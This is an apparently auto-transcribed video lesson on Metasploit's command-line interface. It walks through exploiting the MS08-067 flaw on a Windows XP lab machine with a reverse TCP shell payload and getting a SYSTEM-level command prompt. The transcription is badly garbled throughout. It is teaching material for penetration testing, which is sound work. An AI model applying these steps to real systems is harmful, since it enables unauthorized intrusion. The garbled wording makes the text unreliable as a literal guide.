Metasploit (part 5) msfcli

00:04

now we're going to look at most was command line interface or missive. CLI are Beckett Kelly's main Clint Mannlein. We're outside of them. Must've console MSF, CLI and then Dodge age to get the help information.

00:19

So what we want to do here is actually create our medicine. What model in one lines instead of doing use vulgar names, show options, set any relevant option one by one set of payload, setting the options for that and then find links to exploit or run.

00:35

We are actually going to do it all in one line. This is, I've found to be useful for two different things. One if you want to use my this plate with a tool like my smart friend contest framework whenever it interacts with medicine. Lloyd I used to command line interface,

00:50

since it allows me to do everything in one lines. Was very script a ble for use in programs, so I know a lot of other tools do say they use a command line interface. So it's worth knowing if you ever build any tools that we're going to interact with medicine, and many of them do whose mass plate is very powerful standard

01:08

in information security. Also, if you are building that despite modules, which again we will write one of our own in the exploit development section.

01:19

If you are like me and make syntax errors when you are programming, which many many programmers do,

01:26

you will have to. If you use the myth of counsel, you'll have to reload the entire model tree every time,

01:32

which you can do from a massive console to

01:36

take into account the changes you made to try and fix the syntax. But with MSF cli, you could hit the up arrow, get the previous command, so I think it's a little bit faster in general. It's a little bit slower, as you'll see, because it does said, Load the module tree every time we run it.

01:53

But for exploit development for building medicine like modules, I've found this a little bit faster, so I prefer it. In that case again. Generally, I used most of console, so we're just going to use MSF. Cli briefly

02:06

didn't see how to do it.

02:07

So here we have

02:09

our options that we can use here.

02:12

So basically again, what we want to do is create

02:15

our exploit or our auxiliary or handler anything we want to do. The medicine late model all in one line. So we are going to set our options like this option equals value. So instead of set option and the value of spaces will just say option equals value. Then finally, we'll put the mood

02:32

who see all our modes down here. Some of them we've seen before, like options payload summary. That's like info

02:39

and targets. We've seen those. So instead of saying show options or show payloads or show targets in so we can use thes modes of the ends of a big a big P big aspic tea we also execute. That's like they exploit a run. Help! We're looking at that as it says,

02:59

some of the other ones we will see in the classic advance. We haven't seen those yet. Check. We'll see that.

03:06

But we aren't going to need those here. So what we want to do first is come up with a model we want to use. Let's stick with that Exploit

03:15

windows. SMB, Miss await Underscore 067 Underscoring that a p I, though the same one we used previously. When we did our MSF consul Exploit. I don't want to give away too many of the vulnerabilities that are actually here. We will work through finding them so we'll just stick with this one that we know is here

03:36

for now.

03:37

And we can see our options with a big O.

03:39

Who could ask it the options? But we know we also need to set a payload. We are going to have to set options for that payload as well. So we actually save ourselves a step if we just go ahead and ask what the payloads are,

03:53

and we can skip all of these intermediate steps. In fact, if you're doing this inside of a script, you will You're going to run a specific exploit. You will.

04:03

I know what those options are askew used, for instance, in miso 678 p i over and over again you become familiar with the options are what the payload you want to use is

04:14

and what its options are as well. But there are many, many medicine wait modules. So it was always good to know how we can ask. Their goal here is to make it all one line in the end, but we can use thes

04:27

mood flags, too.

04:29

Help us out so we'll start with the big P. Ask it. What is payloads? Are we used window shell buying underscored TCP in our previous example

04:40

so we can use

04:42

any of these payloads that come up So we should see lots of Windows payloads here that is again loading the module tree on the fly here, whereas with them as if counsel it's a bit faster because it leads the module tree at the beginning and keeps it loaded

04:58

so you can look through this list. I encourage you to spend some time trying different payloads that let's just set payload equals again. It's option equals. And then what? We want to shut it, too.

05:10

So windows do shell

05:12

reverse, underscore TCP again with the two sliders. So this is going to be staged. We have payload equals window shell, reverse underscore TCP. And now we can do that Big O

05:26

to ask for the options. And now this will show us the options for both the module, the exploit in the Soviet 067 and the payload so the window shall reverse TCP. There's kind of skipped a step here. We could have asked for the options first and then sort of payload. But this way we can get all the options in one step

05:47

and again we can skip the steps as we become more familiar with it. You can

05:51

just go ahead and write everything out without asking it anything. If you are able

05:57

so

05:59

familiar here, our host. So that's going to be the Ivy address of Windows X p

06:03

our port for 45 s and B price his browser. We now know that that is correct from the auxiliary module we ran in the previous video.

06:15

So only thing we need to set down here with the payload

06:19

l host it also has Ella port. So that's going to report to listen on. And l host, unlike with are buying Shell where it just had the port to open the shell on 4444 by default on that as well,

06:33

almost is going to be the host to call back to you. So we need to give the I p address of Cali. In this case, you could set up the listener somewhere else

06:42

in the sea. To instance, in the cloud if you want to, it doesn't necessarily have to call the activity. Same medicine boy instance that we used to set it up, but

06:53

that's what we'll do here was have it called back to Cali.

06:56

So let's see, what is Callie's I. P address. Very good question. In my case, 1 91 681.77 yours is probably different.

07:05

Let's get rid of this thing. Oh, here.

07:09

And a duty to set our host equals to I p address of

07:16

our extreme machines. In my case, it's 1 91 681 dose of the six actually started taping in.

07:24

If he addresses from the other network. Haven't got into that won yet. There's a second network lying around here

07:31

says that our host,

07:33

our port and as a B. Piper finds that so l host equal to that i p address

07:42

of R. Kelly machines. So 91 681.77 in my case,

07:48

and we can set L port if we want to change it from 4444 You know how to do that? Same way l port equals on. Then whatever port we want,

07:59

but it looks good to me. Let's go ahead and run it. So we do you for execute to run it.

08:05

So from here, it should work the same way as a mess of consulate. Should set up a payload handler this time for our reverse payload.

08:11

Be able to handle the stage payload.

08:16

It does need to load the module free first showed an of counsel a little bit faster. Then there we go. We should have

08:22

and you shell here. So

08:26

the flight thing with medicine. But occasionally it seems to not actually give us the

08:31

prompt. So it should show us that. See Windows System 32 here.

08:37

Just go ahead and board. It was control. See? Try it again. See if it works this time. I don't see that happening with my interpreter. And we will

08:45

used interpreter extensively,

08:48

occasionally with command shells. That happens. I'd like to start with the command shows.

08:52

See, there you see Windows system 32 years now we have a prompt and we can start running system commands. User

09:03

your users of any windows commands that we want. We are systems that we should have access to everything

09:09

on you know you can again control, see to get rid of it.

09:15

So very similar sentiments of council. Really? The whole point is that we now have the ability to run things in one line so we can script it. My main usage for it is for scripting inside of other programs when I want to talk to Menace would. So I think it's worth knowing. But again we will spend most of our time